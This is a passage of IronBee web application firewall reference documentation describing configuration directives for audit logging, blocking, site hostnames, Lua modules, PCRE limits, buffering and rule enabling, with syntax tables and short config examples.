`AuditEngine` to\n`On` activates audit logging for *all transactions*, which may cause a\nlarge amount of data to be logged.\n\n=== AuditLogBaseDir\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the directory where individual audit log entries will be stored. This also serves as the base directory for `AuditLogIndex` if it uses a relative path.\n| Syntax|`AuditLogBaseDir <path>`\n| Default|`\"\/var\/log\/ironbee\"`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.3\n|===============================================================================\n\n=== AuditLogDirMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the directory mode that will be used for new directories created during audit logging.\n| Syntax|`AuditLogDirMode <octal-mode>`\n| Default|`0700`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== AuditLogFileMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the file mode that will be used when creatingindividual audit log files.\n| Syntax|`AuditLogFileMode <octal-mode>`\n| Default|`0600`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\n=== AuditLogIndex\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the audit log index file.\n| Syntax|`AuditLogIndex None\\|<location>`\n| Default|`ironbee-index.log`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nRelative filenames are based off the `AuditLogBaseDir` directory and\nspecifying `None` disables the index file entirely.\n\n=== AuditLogIndexFormat\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the format of the entries logged in the auditlog index file.\n| Syntax|`AuditLogIndexFormat <format>`\n| Default|`%T %h %a %S %s %t %f`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n* *%%* The percent sign\n* *%a* Remote IP-address\n* *%A* Local IP-address\n* *%h* HTTP Hostname\n* *%s* Site ID\n* *%S* Sensor ID\n* *%t* Transaction ID\n* *%T* Transaction timestamp (YYYY-MM-DDTHH:MM:SS.ssss+\/-ZZZZ)\n* *%f* Audit log filename (relative to `AuditLogBaseDir`)\n\n=== AuditLogParts\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures which parts will be logged to the audit log.\n| Syntax|`AuditLogPart <options>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nAn audit log consist of many parts; `AuditLogParts` determines which\nparts are recorded by default. The parts are inherited into child\ncontexts (Site, Location, etc). Specifying a part with +\/- operator will\nadd or remove the given part from the current set of parts. Specifying\nthe first option without +\/- operators will cause all options to be\noverridden and the list of options will be the only options set. Here is\nwhat your configuration might look like:\n\n-------------------------------------------------------------------\nAuditLogParts minimal +request -requestBody +response -responseBody\n-------------------------------------------------------------------\n\nThe above first resets the list of parts to *minimal*, adds all the\n*request* parts except the *requestBody*, then adds all the *response*\nparts except the *responseBody*.\n\nLater, in a sub-context, you may wish to enable response body logging\nand thus can just specify this part with the + operator:\n\n----------------------\n<Location \/some\/path>\n AuditLogParts \n<\/Location>\n----------------------\n\nIf you already had response body logging enabled, but didn't want it any\nmore, you would write:\n\n----------------------\n<Location \/some\/path>\n AuditLogParts \n<\/Location>\n----------------------\n\nAudit Log Part Names:\n\n* *header:* Audit Log header (required)\n* *events:* List of events that triggered\n* *requestMetadata:* Information about the request\n* *requestHeaders:* Raw request headers\n* *requestBody:* Raw request body\n* *requestTrailers:* Raw request trailers\n* *responseMetadata:* Information about the response\n* *responseHeaders:* Raw response headers\n* *responseBody:* Raw response body\n* *responseTrailers:* Raw response trailers\n* *debugFields:* Currently not implemented\n\nAudit Log Part Group Names:\n\nThese are just aliases for multiple parts.\n\n* *none:* Removes all parts\n* *minimal:* Minimal parts (currently *header* and *events* parts)\n* *default:* Default parts (currently *minimal* and request\/response\nparts without bodies)\n* *request:* All request related parts\n* *response:* All response related parts\n* *debug:* All debug related parts\n* *all:* All parts\n\n=== AuditLogSubDirFormat\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the directory structure created under the `AuditLogBaseDir` directory. This is a +strftime(3)+ format string allowing the directory structure to be created based on date\/time.\n| Syntax|`AuditLogSubDirFormat <format>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== AuthBasicRealm\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the Basic Auth Realm used to challenge a user.\n| Syntax|`AuthBasicRealm <realm-string>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident_authbasic\n| Version|0.8\n|===============================================================================\n\n=== BlockingMethod\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the default blocking method.\n| Syntax|`BlockingMethod status=<code> \\| close`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.8\n|===============================================================================\n\n=== DefaultBlockStatus\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the default HTTP status code used for blocking.\n| Syntax|`DefaultBlockStatus`\n| Default|`403`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== ErrorPageMap\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the error page contents for a given status code.\n| Syntax|`ErrorPageMap <http-status-code> <file>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|error_page\n| Version|0.9\n|===============================================================================\n\nWhen an error page is generated (blocked), the status code is mapped to a file to\ndeliver as the body.\n\n=== FastAutomata\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads the automata for \"fast\" rules.\n| Syntax|`FastAutomata <automata-file>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|error_page\n| Version|0.9\n|===============================================================================\n\n=== GeoIPDatabaseFile\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the geoip database file.\n| Syntax|`GeoIPDatabaseFile <geoip-db-file>`\n| Default|`\/usr\/share\/geoip\/GeoLiteCity.dat`\n| Context|Any\n|Cardinality|0..1\n| Module|geoip\n| Version|0.4\n|===============================================================================\n\n=== Hostname\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Maps hostnames to a Site.\n| Syntax|`Hostname <hostname>`\n| Default|`*` (any)\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThe `Hostname` directive establishes a mapping between a Site and one or\nmore hostnames. To map IP\/Port pairs to a Site, see the `Service`\ndirective.\n\nIn the simplest case, a site will occupy a single hostname:\n\n------------------------\nHostname www.ironbee.com\n------------------------\n\nMore often than not, however, several names will be used:\n\n------------------------\nHostname www.ironbee.com\nHostname ironbee.com\n------------------------\n\nWildcards are permitted when there are multiple names under a common\ndomain. Only one wildcard character per hostname is allowed and it must\ncurrently be on the left-hand side:\n\n----------------------\nHostname ironbee.com\nHostname *.ironbee.com\n----------------------\n\nFinally, to match any hostname (which you will need to do in default\nsites), use a single asterisk, which is the default if no `Hostname`\ndirective is specified for a site:\n\n----------\nHostname *\n----------\n\n=== IdentMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configure the ident mode.\n| Syntax|`IdentMode <mode>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident\n| Version|0.8\n|===============================================================================\n\n=== IdentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configure the ident type.\n| Syntax|`IdentType <type>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|ident\n| Version|0.8\n|===============================================================================\n\n=== Include\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Includes external file into configuration.\n| Syntax|`Include`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.5\n|===============================================================================\n\nAllows inclusion of another file into the current configuration file.\nThe following line will include the contents of the file `sites.conf`\ninto configuration:\n\n-----------------------\nInclude conf\/sites.conf\n-----------------------\n\nThe file must exist and be accessible or an error is generated (use\n`IncludeIfExists` if this is not the case). If you specify a relative\npath, the location of the configuration file containing this directive\nwill be used to resolve it.\n\n=== IncludeIfExists\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Includes external file into configuration if it exists and is accessible.\n| Syntax|`IncludeIfExists`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.7\n|===============================================================================\n\nAs `Include`, but allows for optional inclusion without causing a\nconfiguration error if the file does not exist (as would the `Include`\ndirective).\n\n=== InitCollection\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Initializes a locally scoped collection data field for later use and optional persistence.\n| Syntax|`InitCollection <uri> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|initcollection, persist\n| Version|0.7\n|===============================================================================\n\nInitializes a collection from the initializer. The initializer format\ndepends on the implementation. There are multiple URI formats supported,\nwhich are described below.\n\nCore Functionality\n^^^^^^^^^^^^^^^^^^\n\n`vars: key1=val1 key2=val2 ... keyN=valN`\n\nThe `vars` URI allows initializing a collection of simple key\/value\npairs.\n\n----------------------------------------------------\nInitCollection MY_VARS vars: key1=value1 key2=value2\n----------------------------------------------------\n\n`json-file:\/\/\/path\/file.json [persist]`\n\nThe json-file URI allows loading a more complex collection from a JSON\nformatted file. If the optional persist parameter is specified, then\nanything changed is persisted back to the file at the end of the\ntransaction. Next time the collection is initialized, it will be from\nthe persisted data.\n\n-----------------------------------------------------------------------------------------------\nInitCollection MY_JSON_COLLECTION json-file:\/\/\/tmp\/ironbee\/persist\/test1.json\nInitCollection MY_PERSISTED_JSON_COLLECTION json-file:\/\/\/tmp\/ironbee\/persist\/test2.json persist\n-----------------------------------------------------------------------------------------------\n\n=== InitVar\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Initializes a locally scoped variable data field for later use.\n| Syntax|`InitVar <name> <value>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\n=== InspectionEngineOptions\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures options for the inspection engine.\n| Syntax|`InspectionEngineOptions <options>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.7\n|===============================================================================\n\nThe inspection engine allows setting options; `InspectionEngineOptions`\ncontrols these options. The options are inherited into child contexts\n(Site, Location, etc). Specifying an option with +\/- operator will add\nor remove the given option from the current set. Specifying the first\noption without +\/- operators will cause all options to be overridden and\nthe list of options will be the only options set. Here is what your\nconfiguration might look like:\n\n-------------------------------------\nInspectionEngineOptions all -response\n-------------------------------------\n\nThe above first resets the inspection to *all*, then removes the\n*response* from being inspected.\n\nLater, in a sub-context, you may wish to enable response response\ninspection and thus can just specify this part with the + operator:\n\n-------------------------------------\n<Location \/some\/path>\n InspectionEngineOptions +response\n<\/Location>\n-------------------------------------\n\nIf you already had response enabled, but did not want it enabled, you\nwould write:\n\n-------------------------------------\n<Location \/some\/other\/path>\n InspectionEngineOptions -response\n<\/Location>\n-------------------------------------\n\nInspection Engine Options::\n* *requestHeader:* Inspect the HTTP request header (default)\n* *requestBody:* Inspect the HTTP request body\n* *responseHeader:* Inspect the HTTP response header\n* *responseBody:* Inspect the HTTP response body\n\nInspection Engine Option Group Names::\n* *none:* Removes all options\n* *default:* Default options (currently request header only)\n* *request:* All request related options\n* *response:* All response related options\n* *all:* All options\n\n=== LoadEudoxus\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads an external Eudoxus Automata into IronBee.\n| Syntax|`LoadEudoxus <name> <automata-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|ee\n| Version|0.7\n|===============================================================================\n\nThis directive will load an external eudoxus automata from `file` into\nthe engine with the given `name`. Once loaded, the automata can then be\nused with the associated eudoxus rule operators such as the\n`ee_match_any` operator.\n\nThe eudoxus automata is a precompiled and optimized automata generated\nby the ac_generator and ec commands in the `automata\/bin` directory.\nCurrently, as of IronBee 0.7, a modified Aho-Corasick algorithm is\nimplemented which can handle very large external dictionaries. Refer to\nthe\nhttps:\/\/www.ironbee.com\/docs\/devexternal\/ironautomata.html[IronAutomata\nDocumentation] for more information.\n\n=== LoadModule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads an external module into configuration.\n| Syntax|`LoadModule <module-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis directive will add an external module to the engine, potentially\nmaking new directives available to the configuration.\n\n=== Location\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a subcontext that can have a differentconfiguration.\n| Syntax|`<Location path>...<\/Location>`\n| Default|None\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.4\n|===============================================================================\n\nA sub-context created by this directive initially has identical\nconfiguration to that of the site it belongs to. Further directives are\nrequired to introduce changes. Locations are evaluated in the order in\nwhich they appear in the configuration file. The first location that\nmatches request path will be used. This means that you should put the\nmost-specific location first, followed by the less specific ones.\n\n---------------------------------------\nInclude rules.conf\n\n<Site site1>\n Service *:80\n Service 10.0.1.2:443\n Hostname site1.example.com\n\n <Location \/prefix\/app1>\n RuleEnable all\n <\/Location>\n\n <Location \/prefix>\n RuleEnable tag:GenericRules\n <\/Location>\n<\/Site>\n---------------------------------------\n\n=== Log\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the location of the log file.\n| Syntax|`Log <location>`\n| Default|`default`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== LogLevel\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the detail level of the entries recorded tothe log.\n| Syntax|`LogLevel <level>`\n| Default|`warning`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThe following log levels are supported (either numeric or text)::\n* * 0 - emergency* - system unusable\n* * 1 - alert* - crisis happened\n* * 2 - critical* - crisis coming\n* * 3 - error* - error occurred\n* * 4 - warning* - error likely to occur\n* * 5 - notice* - something unusual happened\n* * 6 - info* - informational messages\n* * 7 - debug* - debugging: transaction state changes\n* * 8 - debug2* - debugging: log of activities carried out\n* * 9 - debug3* - debugging: activities, with more detail\n* *10 - trace* - debugging: developer log messages\n\n=== LuaLoadModule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Load a Lua module (similar to LoadModule).\n| Syntax|`LuaLoadModule <lua-module-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n--------------------------------\nLuaLoadModule \"threat_level.lua\"\n--------------------------------\n\n=== LuaInclude\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Execute a Lua script as a configuration file.\n| Syntax|`LuaInclude <lua-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n----------------------\nLuaInclude \"rules.lua\"\n----------------------\n\n=== LuaPackageCPath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the Lua C package path.\n| Syntax|`LuaPackageCPath <lua-cpath>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n=== LuaPackagePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the Lua package path.\n| Syntax|`LuaPackageCPath <lua-cpath>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n=== LuaSet\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Set a named configuration parameter in a lua module.\n| Syntax|`LuaSet <lua-module-name> <name> <value>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|lua\n| Version|0.7\n|===============================================================================\n\n.Example\n----------------------------------------------\nLuaLoadModule \"my-lua-module.lua\"\n...\nLuaSet \"my-lua-module.lua\" MY_VAR \"some value\"\n----------------------------------------------\n\n=== ModuleBasePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the base path where IronBee modules are loaded.\n| Syntax|`ModuleBasePath`\n| Default|The `libexec` directory under the IronBee install prefix.\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== PcreDfaWorkspaceSize\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE DFA workspace size.\n| Syntax|`PcreDfaWorkspaceSize <size>`\n| Default|200\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreJitStackMax\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE stack maximum size.\n| Syntax|`PcreJitStackMax <size>`\n| Default|0 (auto)\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreJitStackStart\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE stack starting size.\n| Syntax|`PcreJitStackStart <size>`\n| Default|0 (auto)\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreMatchLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library match limit.\n| Syntax|`PcreMatchLimit`\n| Default|5000\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\nFrom the `pcreapi` manual: ``The match_limit field provides a means of\npreventing PCRE from using up a vast amount of resources when running\npatterns that are not going to match, but which have a very large number\nof possibilities in their search trees. The classic example is a pattern\nthat uses nested unlimited repeats.''\n\n=== PcreMatchLimitRecursion\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library match limit recursion.\n| Syntax|`PcreMatchLimitRecursion`\n| Default|5000\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\nFrom the `pcreapi` manual: ``The match_limit_recursion field is similar\nto match_limit, but instead of limiting the total number of times that\nmatch() is called, it limits the depth of recursion. The recursion depth\nis a smaller number than the total number of calls, because not all\ncalls to match() are recursive. This limit is of use only if it is set\nsmaller than match_limit.''\n\n=== PcreStudy\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE \"study\" option.\n| Syntax|`PcreStudy On \\| Off`\n| Default|On\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PcreUseJit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the PCRE library to use the JIT.\n| Syntax|`PcreUseJit On \\| Off`\n| Default|On\n| Context|Main\n|Cardinality|0..1\n| Module|pcre\n| Version|0.4\n|===============================================================================\n\n=== PersistenceMap\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Map a collection to a persistence store.\n| Syntax|`PersistenceMap <collection> <store> [key=value]`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|persistence_framework, persist\n| Version|0.7\n|===============================================================================\n\nSee: <<_persisting_collections>>\n\n=== PersistenceStore\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a persistence store.\n| Syntax|`PersistenceStore <name> <uri>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|persistence_framework, persist\n| Version|0.7\n|===============================================================================\n\nSee: <<_persisting_collections>>\n\n=== PredicateAssertValid\n|===============================================================================\n|Description|Validate predicate, write a predicate report to file or stderr and abort on error.\n| Syntax|`PredicateAssertValid <file> \\| \"\"`\n| Default|\"\" (stderr)\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.8\n|===============================================================================\n\n=== PredicateDebugReport\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Write a predicate debug report to file or stderr.\n| Syntax|`PredicateDebugReport <file> \\| \"\"`\n| Default|\"\" (stderr)\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.8\n|===============================================================================\n\n=== PredicateDefine\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a predicate template.\n| Syntax|`PredicateDefine ...`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.9\n|===============================================================================\n\n=== PredicateTrace\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable predicate trace output to file or stderr.\n| Syntax|`PredicateTrace <file> \\| \"\"`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|predicate\n| Version|0.9\n|===============================================================================\n\n=== ProtectionEngineOptions\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures options for the protection engine.\n| Syntax|`ProtectionEngineOptions ...`\n| Default|`default`\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.8\n|===============================================================================\n\nThe protection engine allows setting options; `ProtectionEngineOptions`\ncontrols these options. The options are inherited into child contexts\n(Site, Location, etc). Specifying an option with +\/- operator will add\nor remove the given option from the current set. Specifying the first\noption without +\/- operators will cause all options to be overridden and\nthe list of options will be the only options set. Here is what your\nconfiguration might look like:\n\n----------------------------\nProtectionEngineOptions none\n----------------------------\n\nThe above resets the inspection to *none*.\n\nLater, in a sub-context, you may wish to enable blocking and thus can\njust specify this with the + operator:\n\n-----------------------------------------\n<Location \/some\/path>\n ProtectionEngineOptions +blockingMode\n<\/Location>\n-----------------------------------------\n\nIf you already had blocking mode enabled, but did not want it any more,\nyou would write:\n\n-----------------------------------------\n<Location \/some\/other\/path>\n ProtectionEngineOptions -blockingMode\n<\/Location>\n-----------------------------------------\n\nProtection Engine Options::\n* *blockingMode:* Control blocking actions.\n\nProtection Engine Option Group Names::\n* *none:* Removes all options\n* *default:* Default options (currently none)\n* *all:* All options\n\n=== RequestBodyBufferLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the request body buffer.\n| Syntax|`RequestBodyBufferLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== RequestBodyBufferLimitAction\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures what happens when the buffer is smaller than the request body.\n| Syntax|`RequestBodyBufferLimitAction FlushAll \\| FlushPartial`\n| Default|FlushPartial\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\nWhen `FlushAll` is configured, the transaction with a body larger than\nthe buffer will flush the existing buffer, sending it to the backend,\nthen continue to fill the buffer with the remaining data. With\n`FlushPartial` selected, the buffer will be used to keep as much data as\npossible, but any overflowing data will be flushed and sent to the\nbackend. Request headers will be sent before the first overflow batch.\n\n=== RequestBodyLogLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the request body logged to an audit log.\n| Syntax|`RequestBodyLogLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== RequestBuffering\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/disable request buffering.\n| Syntax|`RequestBuffering On \\| Off`\n| Default|`Off`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\nControl request buffering - holding the request during inspection.\nCurrently the HTTP header is always buffered, but this must be enabled\nfor the request body to be buffered.\n\nNOTE: This may be renamed to `RequestBodyBuffering` in a future release.\n\n=== ResponseBodyBufferLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the response body buffer.\n| Syntax|`ResponseBodyBufferLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== ResponseBodyBufferLimitAction\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures what happens when the buffer is smaller than the response body.\n| Syntax|`ResponseBodyBufferLimitAction FlushAll \\| FlushPartial`\n| Default|FlushPartial\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\nWhen `FlushAll` is configured, the transaction with a body larger than\nthe buffer will flush the existing buffer, sending it to the client,\nthen continue to fill the buffer with the remaining data. With\n`FlushPartial` selected, the buffer will be used to keep as much data as\npossible, but any overflowing data will be flushed and sent to the\nclient. Request headers will be sent before the first overflow batch.\n\n=== ResponseBodyLogLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the response body logged to an audit log.\n| Syntax|`ResponseBodyLogLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== ResponseBuffering\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/disable response buffering.\n| Syntax|`ResponseBuffering On \\| Off`\n| Default|`Off`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\nControl response buffering - holding the response during inspection.\nCurrently the HTTP header is always buffered, but this must be enabled\nfor the response body to be buffered.\n\nNOTE: This may be renamed to `ResponseBodyBuffering` in a future release.\n\n=== Rule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads a rule and, in most contexts, enable the rule for execution in that context.\n| Syntax|`Rule TARGET @operator \"param\" id:1234 rev:1 phase:THE_PHASE ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\n[NOTE]\nLoading a rule will, in most contexts, also enable the rule to be\nexecuted in that context. However, the main configuration context is\nspecial. Loading a rule in the main configuration context will _NOT_\nenable the rule, but just load it into memory so that it can be shared\nby other contexts. You must explicitly use `RuleEnable` in another\ncontext to enable the rule.\n\n=== RuleBasePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the base path where external IronBee rules are loaded.\n| Syntax|`RuleBasePath <path>`\n| Default|The `libexec` directory under the IronBee install prefix.\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== RuleDisable\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Disables a rule from executing in the current configuration context.\n| Syntax|`RuleDisable \"all\" \\| \"id:<id>\" \\| \"tag:<tag>\" ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nRules can be disabled by id or tag. Any number of id or tag modifiers\ncan be specified per directive. All disables are processed after\nenables. See the `RuleEnable` directive for an example.\n\n=== RuleEnable\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enables a rule for execution in the current configuration context.\n| Syntax|`RuleEnable \"all\" \\| \"id:<id>\" \\| \"tag:<tag>\" ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nRules can be disabled by id or tag. Any number of id or tag modifiers\ncan be specified per directive. All enables are processed before\ndisables. For example:\n\n------------------------------------------------------------\nInclude \"rules\/big_ruleset.conf\"\n\n<Site foo>\n Hostname foo.example.com\n RuleEnable id:1234\n RuleEnable id:3456 tag:SQLi\n RuleDisable id:5678 tag:experimental tag:heavyweight\n<\/Site>\n------------------------------------------------------------\n\n=== RuleEngineLogData\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the data logged by the rule engine.\n| Syntax|`RuleEngineLogData <options>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.6\n|===============================================================================\n\nThe following data type options are supported:\n\n* *tx* - Log the transaction:\n+\n------------------------------------\nTX_START clientip:port site-hostname\n ...\nTX_END\n------------------------------------\n* *requestLine* - Log the HTTP request line:\n+\n-------------------------------------\nREQ_LINE method uri version-if-given \n-------------------------------------\n* *requestHeader* - Log the HTTP request header:\n+\n----------------------\nREQ_HEADER name: value\n----------------------\n* *requestBody* - Log the HTTP request body, possibly in multiple\nchunks:\n+\n------------------\nREQ_BODY size data\n------------------\n* *responseLine* - Log the HTTP response line:\n+\n--------------------------------\nRES_LINE version status message \n--------------------------------\n* *responseHeader* - Log the HTTP response header:\n+\n----------------------\nRES_HEADER name: value\n----------------------\n* *responseBody* - Log the HTTP response body, possibly in multiple\nchunks:\n+\n------------------\nRES_BODY size data\n------------------\n* *phase* - Log the phase about to execute:\n+\n----------\nPHASE name\n----------\n* *rule* - Log the rule executing:\n+\n--------------------\nRULE_START rule-type\n ...\nRULE_END\n--------------------\n* *target* - Log the target being inspected:\n+\n---------------------------------------------------------------------\nTARGET full-target-name {NOT_FOUND|field-type field-name field-value}\n---------------------------------------------------------------------\n* *transformation* - Log the transformation being executed:\n+\n---------------------------------\nTFN tfn-name(param) {ERROR error}\n---------------------------------\n* *operator* - Log the operator being executed:\n+\n------------------------------------------\nOP op-name(param) TRUE|FALSE {ERROR error}\n------------------------------------------\n* *action* - Log the action being executed:\n+\n---------------------------------------\nACTION action-name(param) {ERROR error}\n---------------------------------------\n* *event* - Log the event being logged:\n+\n--------------------------------------------------------------\nEVENT rule-id type action [confidence\/severity] [csv-tags] msg\n--------------------------------------------------------------\n* *audit* - Log the audit log filename being written:\n+\n------------------------\nAUDIT audit-log-filename\n------------------------\n\nThe following alias options are supported:\n\n* *request* - Alias for: *requestLine*, *requestHeader*, *requestBody*\n* *response* - Alias for: *responseLine*, *responseHeader*,\n*responseBody*\n* *ruleExec* - Alias for: *phase*, *rule*, *target*, *transformation*,\n*operator*, *action*, *actionableRulesOnly*\n* *none* - Alias for no data options\n* *all* - Alias for all data options\n* *default* - Alias for: *none*\n\nThe following filter options are supported:\n\n* *actionableRulesOnly* - Filter option indicating that only rules that\nwere actionable (actions executed) are logged - any rule specific\nlogging are delayed\/suppressed until at least one action is executed.\n\n=== RuleEngineLogLevel\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the logging level which the rule engine will write logs.\n| Syntax|`RuleEngineLogLevel`\n| Default|`info`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\n=== RuleExt\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a rule implemented externally, either by loading the rule directly from a file, or referencing a rule 